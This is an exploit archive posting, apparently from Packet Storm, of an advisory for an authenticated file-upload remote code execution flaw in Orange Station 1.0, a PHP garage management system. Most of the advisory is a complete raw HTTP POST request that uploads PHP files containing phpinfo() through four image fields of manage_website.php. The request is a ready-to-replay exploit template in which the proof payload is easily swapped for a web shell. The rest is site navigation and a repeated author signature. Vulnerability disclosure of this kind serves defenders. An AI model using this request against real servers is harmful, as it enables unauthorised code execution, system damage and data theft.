Orange Station 1.0 Shell Upload

Orange Station 1.0 Shell Upload: Posted Mar 26, 2024; Authored by nu11secur1ty; Orange Station version 1.0 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 5a9f8a0ab40cab9d931909357ed512b4a4e0910b05218556dc4ed1977fa5b4d8; Download | Favorite | View

Orange Station 1.0 Shell Upload

## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/26/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://portswigger.net/web-security/file-upload,
https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:
The parameters back_login_image, login_image, invoice_image, and
website_image in the manage_website.php application are vulnerable for
File Upload and the server is vulnerable for Remote code execution
after this.
The attacker who has credentials to this system can upload any PHP
file and he can destroy the system or he can steal a very
sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:
```POST
POST /garage/garage/manage_website.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n
Content-Length: 1871
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/garage/garage/manage_website.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="title"

Orange Station
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="footer"

Admin PanelÃ‚Â
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="short_title"

9090909090
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_symbol"

Ã¢â€šÂ¹
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_website_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="website_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
  phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="invoice_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
  phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_login_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
  phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_back_login_image"

service.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="back_login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
  phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="btn_web"


------WebKitFormBoundaryytBZTydZ8OfOJjda--
```

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:
00:27:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Top Authors In Last 30 Days

Red Hat 204 files
Ubuntu 52 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Google Security Research 6 files
Milad Karimi 5 files
Jann Horn 4 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,023)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,346)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,586)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,464)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Orange Station 1.0 Shell Upload

Orange Station 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Orange Station 1.0 Shell Upload

Share This

Orange Station 1.0 Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems